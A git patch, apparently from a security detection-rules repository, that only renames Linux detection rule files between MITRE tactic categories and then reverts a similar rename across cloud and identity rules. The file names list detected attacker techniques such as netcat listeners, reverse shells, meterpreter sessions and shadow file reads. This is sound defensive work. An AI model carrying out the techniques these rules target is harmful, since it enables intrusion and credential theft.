rename from rules/linux/defense_evasion_file_made_executable_via_chmod_inside_container.toml
rename to rules/linux/execution_file_made_executable_via_chmod_inside_container.toml
diff --git a/rules/linux/command_and_control_file_transfer_or_listener_established_via_netcat.toml b/rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml
similarity index 100%
rename from rules/linux/command_and_control_file_transfer_or_listener_established_via_netcat.toml
rename to rules/linux/execution_file_transfer_or_listener_established_via_netcat.toml
diff --git a/rules/linux/credential_access_kubernetes_direct_api_request_via_curl_or_wget.toml b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml
similarity index 100%
rename from rules/linux/credential_access_kubernetes_direct_api_request_via_curl_or_wget.toml
rename to rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml
diff --git a/rules/linux/command_and_control_nc_listener_via_rlwrap.toml b/rules/linux/execution_nc_listener_via_rlwrap.toml
similarity index 100%
rename from rules/linux/command_and_control_nc_listener_via_rlwrap.toml
rename to rules/linux/execution_nc_listener_via_rlwrap.toml
diff --git a/rules/linux/defense_evasion_netcon_from_rwx_mem_region_binary.toml b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml
similarity index 100%
rename from rules/linux/defense_evasion_netcon_from_rwx_mem_region_binary.toml
rename to rules/linux/execution_netcon_from_rwx_mem_region_binary.toml
diff --git a/rules/linux/command_and_control_network_event_post_compilation.toml b/rules/linux/execution_network_event_post_compilation.toml
similarity index 100%
rename from rules/linux/command_and_control_network_event_post_compilation.toml
rename to rules/linux/execution_network_event_post_compilation.toml
diff --git a/rules/linux/credential_access_potential_hack_tool_executed.toml b/rules/linux/execution_potential_hack_tool_executed.toml
similarity index 100%
rename from rules/linux/credential_access_potential_hack_tool_executed.toml
rename to rules/linux/execution_potential_hack_tool_executed.toml
diff --git a/rules/linux/defense_evasion_process_backgrounded_by_unusual_parent.toml b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml
similarity index 100%
rename from rules/linux/defense_evasion_process_backgrounded_by_unusual_parent.toml
rename to rules/linux/execution_process_backgrounded_by_unusual_parent.toml
diff --git a/rules/linux/defense_evasion_process_started_from_process_id_file.toml b/rules/linux/execution_process_started_from_process_id_file.toml
similarity index 100%
rename from rules/linux/defense_evasion_process_started_from_process_id_file.toml
rename to rules/linux/execution_process_started_from_process_id_file.toml
diff --git a/rules/linux/defense_evasion_process_started_in_shared_memory_directory.toml b/rules/linux/execution_process_started_in_shared_memory_directory.toml
similarity index 100%
rename from rules/linux/defense_evasion_process_started_in_shared_memory_directory.toml
rename to rules/linux/execution_process_started_in_shared_memory_directory.toml
diff --git a/rules/linux/defense_evasion_shell_evasion_linux_binary.toml b/rules/linux/execution_shell_evasion_linux_binary.toml
similarity index 100%
rename from rules/linux/defense_evasion_shell_evasion_linux_binary.toml
rename to rules/linux/execution_shell_evasion_linux_binary.toml
diff --git a/rules/linux/command_and_control_shell_openssl_client_or_server.toml b/rules/linux/execution_shell_openssl_client_or_server.toml
similarity index 100%
rename from rules/linux/command_and_control_shell_openssl_client_or_server.toml
rename to rules/linux/execution_shell_openssl_client_or_server.toml
diff --git a/rules/linux/command_and_control_shell_via_background_process.toml b/rules/linux/execution_shell_via_background_process.toml
similarity index 100%
rename from rules/linux/command_and_control_shell_via_background_process.toml
rename to rules/linux/execution_shell_via_background_process.toml
diff --git a/rules/linux/command_and_control_shell_via_child_tcp_utility_linux.toml b/rules/linux/execution_shell_via_child_tcp_utility_linux.toml
similarity index 100%
rename from rules/linux/command_and_control_shell_via_child_tcp_utility_linux.toml
rename to rules/linux/execution_shell_via_child_tcp_utility_linux.toml
diff --git a/rules/linux/command_and_control_shell_via_lolbin_interpreter_linux.toml b/rules/linux/execution_shell_via_lolbin_interpreter_linux.toml
similarity index 100%
rename from rules/linux/command_and_control_shell_via_lolbin_interpreter_linux.toml
rename to rules/linux/execution_shell_via_lolbin_interpreter_linux.toml
diff --git a/rules/linux/discovery_shell_via_meterpreter_linux.toml b/rules/linux/execution_shell_via_meterpreter_linux.toml
similarity index 100%
rename from rules/linux/discovery_shell_via_meterpreter_linux.toml
rename to rules/linux/execution_shell_via_meterpreter_linux.toml
diff --git a/rules/linux/command_and_control_shell_via_suspicious_binary.toml b/rules/linux/execution_shell_via_suspicious_binary.toml
similarity index 100%
rename from rules/linux/command_and_control_shell_via_suspicious_binary.toml
rename to rules/linux/execution_shell_via_suspicious_binary.toml
diff --git a/rules/linux/command_and_control_shell_via_tcp_cli_utility_linux.toml b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml
similarity index 100%
rename from rules/linux/command_and_control_shell_via_tcp_cli_utility_linux.toml
rename to rules/linux/execution_shell_via_tcp_cli_utility_linux.toml
diff --git a/rules/linux/command_and_control_shell_via_udp_cli_utility_linux.toml b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml
similarity index 100%
rename from rules/linux/command_and_control_shell_via_udp_cli_utility_linux.toml
rename to rules/linux/execution_shell_via_udp_cli_utility_linux.toml
diff --git a/rules/linux/defense_evasion_sus_extraction_or_decrompression_via_funzip.toml b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml
similarity index 100%
rename from rules/linux/defense_evasion_sus_extraction_or_decrompression_via_funzip.toml
rename to rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml
diff --git a/rules/linux/discovery_suspicious_executable_running_system_commands.toml b/rules/linux/execution_suspicious_executable_running_system_commands.toml
similarity index 100%
rename from rules/linux/discovery_suspicious_executable_running_system_commands.toml
rename to rules/linux/execution_suspicious_executable_running_system_commands.toml
diff --git a/rules/linux/impact_suspicious_mining_process_creation_events.toml b/rules/linux/execution_suspicious_mining_process_creation_events.toml
similarity index 100%
rename from rules/linux/impact_suspicious_mining_process_creation_events.toml
rename to rules/linux/execution_suspicious_mining_process_creation_events.toml
diff --git a/rules/linux/defense_evasion_system_binary_file_permission_change.toml b/rules/linux/execution_system_binary_file_permission_change.toml
similarity index 100%
rename from rules/linux/defense_evasion_system_binary_file_permission_change.toml
rename to rules/linux/execution_system_binary_file_permission_change.toml
diff --git a/rules/linux/defense_evasion_tc_bpf_filter.toml b/rules/linux/execution_tc_bpf_filter.toml
similarity index 100%
rename from rules/linux/defense_evasion_tc_bpf_filter.toml
rename to rules/linux/execution_tc_bpf_filter.toml
diff --git a/rules/linux/defense_evasion_unusual_kthreadd_execution.toml b/rules/linux/execution_unusual_kthreadd_execution.toml
similarity index 100%
rename from rules/linux/defense_evasion_unusual_kthreadd_execution.toml
rename to rules/linux/execution_unusual_kthreadd_execution.toml
diff --git a/rules/linux/defense_evasion_unusual_path_invocation_from_command_line.toml b/rules/linux/execution_unusual_path_invocation_from_command_line.toml
similarity index 100%
rename from rules/linux/defense_evasion_unusual_path_invocation_from_command_line.toml
rename to rules/linux/execution_unusual_path_invocation_from_command_line.toml
diff --git a/rules/linux/privilege_escalation_unusual_pkexec_execution.toml b/rules/linux/execution_unusual_pkexec_execution.toml
similarity index 100%
rename from rules/linux/privilege_escalation_unusual_pkexec_execution.toml
rename to rules/linux/execution_unusual_pkexec_execution.toml
diff --git a/rules/linux/collection_potential_database_dumping.toml b/rules/linux/exfiltration_potential_database_dumping.toml
similarity index 100%
rename from rules/linux/collection_potential_database_dumping.toml
rename to rules/linux/exfiltration_potential_database_dumping.toml
diff --git a/rules/linux/credential_access_potential_bruteforce_malware_infection.toml b/rules/linux/impact_potential_bruteforce_malware_infection.toml
similarity index 100%
rename from rules/linux/credential_access_potential_bruteforce_malware_infection.toml
rename to rules/linux/impact_potential_bruteforce_malware_infection.toml
diff --git a/rules/linux/credential_access_kubeconfig_file_activity.toml b/rules/linux/lateral_movement_kubeconfig_file_activity.toml
similarity index 100%
rename from rules/linux/credential_access_kubeconfig_file_activity.toml
rename to rules/linux/lateral_movement_kubeconfig_file_activity.toml
diff --git a/rules/linux/command_and_control_ssh_it_worm_download.toml b/rules/linux/lateral_movement_ssh_it_worm_download.toml
similarity index 100%
rename from rules/linux/command_and_control_ssh_it_worm_download.toml
rename to rules/linux/lateral_movement_ssh_it_worm_download.toml
diff --git a/rules/linux/command_and_control_telnet_network_activity_external.toml b/rules/linux/lateral_movement_telnet_network_activity_external.toml
similarity index 100%
rename from rules/linux/command_and_control_telnet_network_activity_external.toml
rename to rules/linux/lateral_movement_telnet_network_activity_external.toml
diff --git a/rules/linux/execution_apt_package_manager_execution.toml b/rules/linux/persistence_apt_package_manager_execution.toml
similarity index 100%
rename from rules/linux/execution_apt_package_manager_execution.toml
rename to rules/linux/persistence_apt_package_manager_execution.toml
diff --git a/rules/linux/execution_apt_package_manager_netcon.toml b/rules/linux/persistence_apt_package_manager_netcon.toml
similarity index 100%
rename from rules/linux/execution_apt_package_manager_netcon.toml
rename to rules/linux/persistence_apt_package_manager_netcon.toml
diff --git a/rules/linux/execution_at_job_creation.toml b/rules/linux/persistence_at_job_creation.toml
similarity index 100%
rename from rules/linux/execution_at_job_creation.toml
rename to rules/linux/persistence_at_job_creation.toml
diff --git a/rules/linux/defense_evasion_boot_file_copy.toml b/rules/linux/persistence_boot_file_copy.toml
similarity index 100%
rename from rules/linux/defense_evasion_boot_file_copy.toml
rename to rules/linux/persistence_boot_file_copy.toml
diff --git a/rules/linux/defense_evasion_bpf_probe_write_user.toml b/rules/linux/persistence_bpf_probe_write_user.toml
similarity index 100%
rename from rules/linux/defense_evasion_bpf_probe_write_user.toml
rename to rules/linux/persistence_bpf_probe_write_user.toml
diff --git a/rules/linux/defense_evasion_bpf_program_or_map_load.toml b/rules/linux/persistence_bpf_program_or_map_load.toml
similarity index 100%
rename from rules/linux/defense_evasion_bpf_program_or_map_load.toml
rename to rules/linux/persistence_bpf_program_or_map_load.toml
diff --git a/rules/linux/credential_access_modify_ssh_binaries.toml b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml
similarity index 100%
rename from rules/linux/credential_access_modify_ssh_binaries.toml
rename to rules/linux/persistence_credential_access_modify_ssh_binaries.toml
diff --git a/rules/linux/execution_cron_job_creation.toml b/rules/linux/persistence_cron_job_creation.toml
similarity index 100%
rename from rules/linux/execution_cron_job_creation.toml
rename to rules/linux/persistence_cron_job_creation.toml
diff --git a/rules/linux/execution_dbus_unsual_daemon_parent_execution.toml b/rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml
similarity index 100%
rename from rules/linux/execution_dbus_unsual_daemon_parent_execution.toml
rename to rules/linux/persistence_dbus_unsual_daemon_parent_execution.toml
diff --git a/rules/linux/execution_git_hook_execution.toml b/rules/linux/persistence_git_hook_execution.toml
similarity index 100%
rename from rules/linux/execution_git_hook_execution.toml
rename to rules/linux/persistence_git_hook_execution.toml
diff --git a/rules/linux/command_and_control_git_hook_netcon.toml b/rules/linux/persistence_git_hook_netcon.toml
similarity index 100%
rename from rules/linux/command_and_control_git_hook_netcon.toml
rename to rules/linux/persistence_git_hook_netcon.toml
diff --git a/rules/linux/execution_git_hook_process_execution.toml b/rules/linux/persistence_git_hook_process_execution.toml
similarity index 100%
rename from rules/linux/execution_git_hook_process_execution.toml
rename to rules/linux/persistence_git_hook_process_execution.toml
diff --git a/rules/linux/defense_evasion_insmod_kernel_module_load.toml b/rules/linux/persistence_insmod_kernel_module_load.toml
similarity index 100%
rename from rules/linux/defense_evasion_insmod_kernel_module_load.toml
rename to rules/linux/persistence_insmod_kernel_module_load.toml
diff --git a/rules/linux/defense_evasion_kernel_driver_load.toml b/rules/linux/persistence_kernel_driver_load.toml
similarity index 100%
rename from rules/linux/defense_evasion_kernel_driver_load.toml
rename to rules/linux/persistence_kernel_driver_load.toml
diff --git a/rules/linux/defense_evasion_kernel_driver_load_by_non_root.toml b/rules/linux/persistence_kernel_driver_load_by_non_root.toml
similarity index 100%
rename from rules/linux/defense_evasion_kernel_driver_load_by_non_root.toml
rename to rules/linux/persistence_kernel_driver_load_by_non_root.toml
diff --git a/rules/linux/defense_evasion_kernel_module_load_from_unusual_location.toml b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml
similarity index 100%
rename from rules/linux/defense_evasion_kernel_module_load_from_unusual_location.toml
rename to rules/linux/persistence_kernel_module_load_from_unusual_location.toml
diff --git a/rules/linux/defense_evasion_kworker_file_creation.toml b/rules/linux/persistence_kworker_file_creation.toml
similarity index 100%
rename from rules/linux/defense_evasion_kworker_file_creation.toml
rename to rules/linux/persistence_kworker_file_creation.toml
diff --git a/rules/linux/initial_access_linux_shell_activity_via_web_server.toml b/rules/linux/persistence_linux_shell_activity_via_web_server.toml
similarity index 100%
rename from rules/linux/initial_access_linux_shell_activity_via_web_server.toml
rename to rules/linux/persistence_linux_shell_activity_via_web_server.toml
diff --git a/rules/linux/credential_access_pluggable_authentication_module_creation.toml b/rules/linux/persistence_pluggable_authentication_module_creation.toml
similarity index 100%
rename from rules/linux/credential_access_pluggable_authentication_module_creation.toml
rename to rules/linux/persistence_pluggable_authentication_module_creation.toml
diff --git a/rules/linux/credential_access_pluggable_authentication_module_creation_in_unusual_dir.toml b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml
similarity index 100%
rename from rules/linux/credential_access_pluggable_authentication_module_creation_in_unusual_dir.toml
rename to rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml
diff --git a/rules/linux/command_and_control_pluggable_authentication_module_source_download.toml b/rules/linux/persistence_pluggable_authentication_module_source_download.toml
similarity index 100%
rename from rules/linux/command_and_control_pluggable_authentication_module_source_download.toml
rename to rules/linux/persistence_pluggable_authentication_module_source_download.toml
diff --git a/rules/linux/privilege_escalation_process_capability_set_via_setcap.toml b/rules/linux/persistence_process_capability_set_via_setcap.toml
similarity index 100%
rename from rules/linux/privilege_escalation_process_capability_set_via_setcap.toml
rename to rules/linux/persistence_process_capability_set_via_setcap.toml
diff --git a/rules/linux/privilege_escalation_setuid_setgid_capability_set.toml b/rules/linux/persistence_setuid_setgid_capability_set.toml
similarity index 100%
rename from rules/linux/privilege_escalation_setuid_setgid_capability_set.toml
rename to rules/linux/persistence_setuid_setgid_capability_set.toml
diff --git a/rules/linux/defense_evasion_shared_object_creation.toml b/rules/linux/persistence_shared_object_creation.toml
similarity index 100%
rename from rules/linux/defense_evasion_shared_object_creation.toml
rename to rules/linux/persistence_shared_object_creation.toml
diff --git a/rules/linux/command_and_control_simple_web_server_connection_accepted.toml b/rules/linux/persistence_simple_web_server_connection_accepted.toml
similarity index 100%
rename from rules/linux/command_and_control_simple_web_server_connection_accepted.toml
rename to rules/linux/persistence_simple_web_server_connection_accepted.toml
diff --git a/rules/linux/initial_access_ssh_via_backdoored_system_user.toml b/rules/linux/persistence_ssh_via_backdoored_system_user.toml
similarity index 100%
rename from rules/linux/initial_access_ssh_via_backdoored_system_user.toml
rename to rules/linux/persistence_ssh_via_backdoored_system_user.toml
diff --git a/rules/linux/execution_suspicious_ssh_execution_xzbackdoor.toml b/rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml
similarity index 100%
rename from rules/linux/execution_suspicious_ssh_execution_xzbackdoor.toml
rename to rules/linux/persistence_suspicious_ssh_execution_xzbackdoor.toml
diff --git a/rules/linux/command_and_control_systemd_netcon.toml b/rules/linux/persistence_systemd_netcon.toml
similarity index 100%
rename from rules/linux/command_and_control_systemd_netcon.toml
rename to rules/linux/persistence_systemd_netcon.toml
diff --git a/rules/linux/execution_systemd_service_started.toml b/rules/linux/persistence_systemd_service_started.toml
similarity index 100%
rename from rules/linux/execution_systemd_service_started.toml
rename to rules/linux/persistence_systemd_service_started.toml
diff --git a/rules/linux/execution_systemd_shell_execution.toml b/rules/linux/persistence_systemd_shell_execution.toml
similarity index 100%
rename from rules/linux/execution_systemd_shell_execution.toml
rename to rules/linux/persistence_systemd_shell_execution.toml
diff --git a/rules/linux/execution_unusual_exim4_child_process.toml b/rules/linux/persistence_unusual_exim4_child_process.toml
similarity index 100%
rename from rules/linux/execution_unusual_exim4_child_process.toml
rename to rules/linux/persistence_unusual_exim4_child_process.toml
diff --git a/rules/linux/defense_evasion_unusual_pam_grantor.toml b/rules/linux/persistence_unusual_pam_grantor.toml
similarity index 100%
rename from rules/linux/defense_evasion_unusual_pam_grantor.toml
rename to rules/linux/persistence_unusual_pam_grantor.toml
diff --git a/rules/linux/lateral_movement_unusual_sshd_child_process.toml b/rules/linux/persistence_unusual_sshd_child_process.toml
similarity index 100%
rename from rules/linux/lateral_movement_unusual_sshd_child_process.toml
rename to rules/linux/persistence_unusual_sshd_child_process.toml
diff --git a/rules/linux/execution_web_server_sus_child_spawned.toml b/rules/linux/persistence_web_server_sus_child_spawned.toml
similarity index 100%
rename from rules/linux/execution_web_server_sus_child_spawned.toml
rename to rules/linux/persistence_web_server_sus_child_spawned.toml
diff --git a/rules/linux/execution_web_server_sus_command_execution.toml b/rules/linux/persistence_web_server_sus_command_execution.toml
similarity index 100%
rename from rules/linux/execution_web_server_sus_command_execution.toml
rename to rules/linux/persistence_web_server_sus_command_execution.toml
diff --git a/rules/linux/command_and_control_web_server_sus_destination_port.toml b/rules/linux/persistence_web_server_sus_destination_port.toml
similarity index 100%
rename from rules/linux/command_and_control_web_server_sus_destination_port.toml
rename to rules/linux/persistence_web_server_sus_destination_port.toml
diff --git a/rules/linux/execution_web_server_unusual_command_execution.toml b/rules/linux/persistence_web_server_unusual_command_execution.toml
similarity index 100%
rename from rules/linux/execution_web_server_unusual_command_execution.toml
rename to rules/linux/persistence_web_server_unusual_command_execution.toml
diff --git a/rules/linux/defense_evasion_chown_chmod_unauthorized_file_read.toml b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml
similarity index 100%
rename from rules/linux/defense_evasion_chown_chmod_unauthorized_file_read.toml
rename to rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml
diff --git a/rules/linux/credential_access_dac_permissions.toml b/rules/linux/privilege_escalation_dac_permissions.toml
similarity index 100%
rename from rules/linux/credential_access_dac_permissions.toml
rename to rules/linux/privilege_escalation_dac_permissions.toml
diff --git a/rules/linux/defense_evasion_kworker_uid_elevation.toml b/rules/linux/privilege_escalation_kworker_uid_elevation.toml
similarity index 100%
rename from rules/linux/defense_evasion_kworker_uid_elevation.toml
rename to rules/linux/privilege_escalation_kworker_uid_elevation.toml
diff --git a/rules/linux/persistence_ld_preload_shared_object_modif.toml b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml
similarity index 100%
rename from rules/linux/persistence_ld_preload_shared_object_modif.toml
rename to rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml
diff --git a/rules/linux/persistence_linux_suspicious_symbolic_link.toml b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml
similarity index 100%
rename from rules/linux/persistence_linux_suspicious_symbolic_link.toml
rename to rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml
diff --git a/rules/linux/defense_evasion_load_and_unload_of_kernel_via_kexec.toml b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml
similarity index 100%
rename from rules/linux/defense_evasion_load_and_unload_of_kernel_via_kexec.toml
rename to rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml
diff --git a/rules/linux/initial_access_potential_bufferoverflow_attack.toml b/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml
similarity index 100%
rename from rules/linux/initial_access_potential_bufferoverflow_attack.toml
rename to rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml
diff --git a/rules/linux/execution_potential_wildcard_shell_spawn.toml b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml
similarity index 100%
rename from rules/linux/execution_potential_wildcard_shell_spawn.toml
rename to rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml
diff --git a/rules/linux/defense_evasion_sda_disk_mount_non_root.toml b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml
similarity index 100%
rename from rules/linux/defense_evasion_sda_disk_mount_non_root.toml
rename to rules/linux/privilege_escalation_sda_disk_mount_non_root.toml
diff --git a/rules/linux/credential_access_shadow_file_read.toml b/rules/linux/privilege_escalation_shadow_file_read.toml
similarity index 100%
rename from rules/linux/credential_access_shadow_file_read.toml
rename to rules/linux/privilege_escalation_shadow_file_read.toml
diff --git a/rules/linux/persistence_sudo_hijacking.toml b/rules/linux/privilege_escalation_sudo_hijacking.toml
similarity index 100%
rename from rules/linux/persistence_sudo_hijacking.toml
rename to rules/linux/privilege_escalation_sudo_hijacking.toml
diff --git a/rules/linux/defense_evasion_suspicious_chown_fowner_elevation.toml b/rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml
similarity index 100%
rename from rules/linux/defense_evasion_suspicious_chown_fowner_elevation.toml
rename to rules/linux/privilege_escalation_suspicious_chown_fowner_elevation.toml
diff --git a/rules/linux/persistence_suspicious_passwd_file_write.toml b/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml
similarity index 100%
rename from rules/linux/persistence_suspicious_passwd_file_write.toml
rename to rules/linux/privilege_escalation_suspicious_passwd_file_write.toml
From 0b7ddfa59572ed0c1721375ea034a496833e0a77 Mon Sep 17 00:00:00 2001
From: Ruben Groenewoud Date: Tue, 24 Mar 2026 11:15:16 +0100 Subject: [PATCH 08/16] Revert "++" This reverts commit e83ddf130daef6fcdece2764d684cca21338d534. --- ...cation.toml => defense_evasion_genai_config_modification.toml} | 0 ...l => defense_evasion_genai_process_compiling_executables.toml} | 0 ...evasion_genai_process_encoding_prior_to_network_activity.toml} | 0 ...ep.toml => discovery_virtual_machine_fingerprinting_grep.toml} | 0 ...ert.toml => initial_access_azure_o365_with_network_alert.toml} | 0 ...ml => persistence_web_server_potential_command_injection.toml} | 0 ...ap_execution.toml => privilege_escalation_trap_execution.toml} | 0 ...ng_created.toml => collection_cloudtrail_logging_created.toml} | 0 ...oup.toml => credential_access_iam_user_addition_to_group.toml} | 0 ...e_restored.toml => defense_evasion_rds_instance_restored.toml} | 0 ... => defense_evasion_s3_bucket_lifecycle_expiration_added.toml} | 0 ..._sqs_purge_queue.toml => defense_evasion_sqs_purge_queue.toml} | 0 ...n_token.toml => defense_evasion_sts_get_federation_token.toml} | 0 ...oml => execution_lambda_external_layer_added_to_function.toml} | 0 ..._user.toml => exfiltration_dynamodb_scan_by_unusual_user.toml} | 0 ...=> exfiltration_ec2_full_network_packet_capture_detected.toml} | 0 ...snapshot_export.toml => exfiltration_rds_snapshot_export.toml} | 0 ...ation_s3_bucket_policy_added_for_external_account_access.toml} | 0 ...=> exfiltration_s3_bucket_policy_added_for_public_access.toml} | 0 ....toml => impact_aws_eventbridge_rule_disabled_or_deleted.toml} | 0 ....toml => impact_aws_s3_bucket_enumeration_or_brute_force.toml} | 0 ...ogging_updated.toml => impact_cloudtrail_logging_updated.toml} | 0 ...up_deletion.toml => impact_cloudwatch_log_group_deletion.toml} | 0 ...m_deletion.toml => impact_cloudwatch_log_stream_deletion.toml} | 0 ...ebs_encryption.toml => impact_ec2_disable_ebs_encryption.toml} | 0 ...vate_mfa_device.toml => impact_iam_deactivate_mfa_device.toml} | 0 
...impact_rds_instance_cluster_deletion_protection_disabled.toml} | 0 ...al_movement_ec2_instance_connect_ssh_public_key_uploaded.toml} | 0 ...ogin.toml => lateral_movement_ec2_instance_console_login.toml} | 0 ... lateral_movement_sns_topic_message_publish_by_rare_user.toml} | 0 ...cl_creation.toml => persistence_ec2_network_acl_creation.toml} | 0 ....toml => persistence_ec2_route_table_modified_or_deleted.toml} | 0 ...stence_ec2_security_group_configuration_change_detection.toml} | 0 ...toml => persistence_iam_api_calls_via_user_session_token.toml} | 0 ...er_created.toml => persistence_iam_oidc_provider_created.toml} | 0 ...stence_lambda_backdoor_invoke_function_for_any_principal.toml} | 0 ...made_public.toml => persistence_rds_instance_made_public.toml} | 0 ...ml => persistence_route_53_domain_transfer_lock_disabled.toml} | 0 ...rsistence_route_53_domain_transferred_to_another_account.toml} | 0 ...> persistence_route_53_hosted_zone_associated_with_a_vpc.toml} | 0 ...te_table_created.toml => persistence_route_table_created.toml} | 0 ...alation_iam_administratoraccess_policy_attached_to_group.toml} | 0 ...calation_iam_administratoraccess_policy_attached_to_role.toml} | 0 ...calation_iam_administratoraccess_policy_attached_to_user.toml} | 0 ..._escalation_iam_customer_managed_policy_attached_to_role.toml} | 0 ...d.toml => privilege_escalation_iam_saml_provider_updated.toml} | 0 ...ml => privilege_escalation_iam_update_assume_role_policy.toml} | 0 ..._chaining.toml => privilege_escalation_sts_role_chaining.toml} | 0 ...l => resource_development_sns_topic_created_by_rare_user.toml} | 0 ....toml => credential_access_key_vault_excessive_retrieval.toml} | 0 ...oml => credential_access_storage_account_key_regenerated.toml} | 0 ...> discovery_entra_id_teamfiltration_user_agents_detected.toml} | 0 ... 
=> discovery_storage_blob_container_access_modification.toml} | 0 ...xfiltration_azure_storage_blob_download_azcopy_sas_token.toml} | 0 ...ccess_azure_arc_cluster_credential_access_unusual_source.toml} | 0 ...ial_access_entra_id_actor_token_user_impersonation_abuse.toml} | 0 ...tial_access_entra_id_device_code_auth_with_broker_client.toml} | 0 ...ml => initial_access_entra_id_external_guest_user_invite.toml} | 0 ...nitial_access_entra_id_federated_login_by_unusual_client.toml} | 0 ...ss_entra_id_graph_single_session_from_multiple_addresses.toml} | 0 ...ntra_id_illicit_consent_grant_via_registered_application.toml} | 0 ...entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml} | 0 ..._id_oauth_phishing_via_first_party_microsoft_application.toml} | 0 ...initial_access_entra_id_protection_sign_in_risk_detected.toml} | 0 ...> initial_access_entra_id_rare_app_id_for_principal_auth.toml} | 0 ...ss_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml} | 0 ... initial_access_graph_first_occurrence_of_client_request.toml} | 0 ...t_created.toml => persistence_automation_account_created.toml} | 0 ... persistence_entra_id_conditional_access_policy_modified.toml} | 0 ..._user.toml => persistence_entra_id_mfa_disabled_for_user.toml} | 0 ...ce_entra_id_privileged_identity_management_role_modified.toml} | 0 ...istence_entra_id_tenant_domain_federation_via_audit_logs.toml} | 0 ... persistence_entra_id_user_signed_in_from_unusual_device.toml} | 0 ...n.toml => persistence_graph_eam_addition_or_modification.toml} | 0 ...ilege_escalation_azure_rbac_administrator_roles_assigned.toml} | 0 ...escalation_entra_id_elevate_to_user_administrator_access.toml} | 0 ... privilege_escalation_kubernetes_aks_rolebinding_created.toml} | 0 ...port.toml => exfiltration_ml_high_bytes_destination_port.toml} | 0 ...oml => defense_evasion_gcp_pub_sub_subscription_deletion.toml} | 0 ...etion.toml => defense_evasion_gcp_pub_sub_topic_deletion.toml} | 0 ... 
defense_evasion_gcp_storage_bucket_permissions_modified.toml} | 0 ...efense_evasion_gcp_virtual_private_cloud_network_deleted.toml} | 0 ...ation.toml => exfiltration_gcp_logging_sink_modification.toml} | 0 ...tion.toml => initial_access_gcp_iam_custom_role_creation.toml} | 0 ...toml => persistence_gcp_iam_service_account_key_deletion.toml} | 0 ..._github_app_deleted.toml => execution_github_app_deleted.toml} | 0 ...=> execution_github_high_number_of_cloned_repos_from_pat.toml} | 0 ...app_installed.toml => execution_new_github_app_installed.toml} | 0 ...user.toml => exfiltration_high_number_of_cloning_by_user.toml} | 0 ...oml => impact_github_repository_activity_from_unusual_ip.toml} | 0 ... => initial_access_github_actions_bot_first_push_to_repo.toml} | 0 ..._google_drive_ownership_transferred_via_google_workspace.toml} | 0 ...orkspace_drive_encryption_key_accessed_by_anonymous_user.toml} | 0 ...toml => impact_google_workspace_mfa_enforcement_disabled.toml} | 0 ...ial_access_external_user_added_to_google_workspace_group.toml} | 0 ...> initial_access_google_workspace_suspended_user_renewed.toml} | 0 ..._access_object_copied_to_external_drive_with_app_consent.toml} | 0 ...toml => persistence_google_workspace_2sv_policy_disabled.toml} | 0 ...=> persistence_google_workspace_password_policy_modified.toml} | 0 ...rsistence_mfa_disabled_for_google_workspace_organization.toml} | 0 ...request.toml => discovery_denied_service_account_request.toml} | 0 ...ion_request.toml => execution_forbidden_creation_request.toml} | 0 ...ml => execution_forbidden_request_from_unsual_user_agent.toml} | 0 ...toml => execution_unusual_request_response_by_user_agent.toml} | 0 ...> persistence_exposed_service_created_with_type_nodeport.toml} | 0 ...tion_container_created_with_excessive_linux_capabilities.toml} | 0 ...pc.toml => privilege_escalation_pod_created_with_hostipc.toml} | 0 ...oml => privilege_escalation_pod_created_with_hostnetwork.toml} | 0 ...id.toml => 
privilege_escalation_pod_created_with_hostpid.toml} | 0 ...ge_escalation_pod_created_with_sensitive_hostpath_volume.toml} | 0 ...ated.toml => privilege_escalation_privileged_pod_created.toml} | 0 ..._sensitive_rbac_change_followed_by_workload_modification.toml} | 0 ...escalation_sensitive_workload_modification_by_user_agent.toml} | 0 ...rivilege_escalation_service_account_rbac_write_operation.toml} | 0 ...tion_suspicious_assignment_of_controller_service_account.toml} | 0 ...s.toml => lateral_movement_ml_high_mean_rdp_process_args.toml} | 0 ...ml => lateral_movement_ml_spike_in_remote_file_transfers.toml} | 0 ...earch.toml => discovery_sharepoint_sensitive_term_search.toml} | 0 ...on.toml => exfiltration_exchange_transport_rule_creation.toml} | 0 ...oml => exfiltration_exchange_transport_rule_modification.toml} | 0 ...dentity_illicit_consent_grant_via_registered_application.toml} | 0 ...ity_oauth_phishing_via_first_party_microsoft_application.toml} | 0 ...l => initial_access_identity_unusual_sso_errors_for_user.toml} | 0 ...ge_escalation_exchange_new_or_modified_federation_domain.toml} | 0 ...vilege_escalation_sharepoint_site_collection_admin_added.toml} | 0 ... 
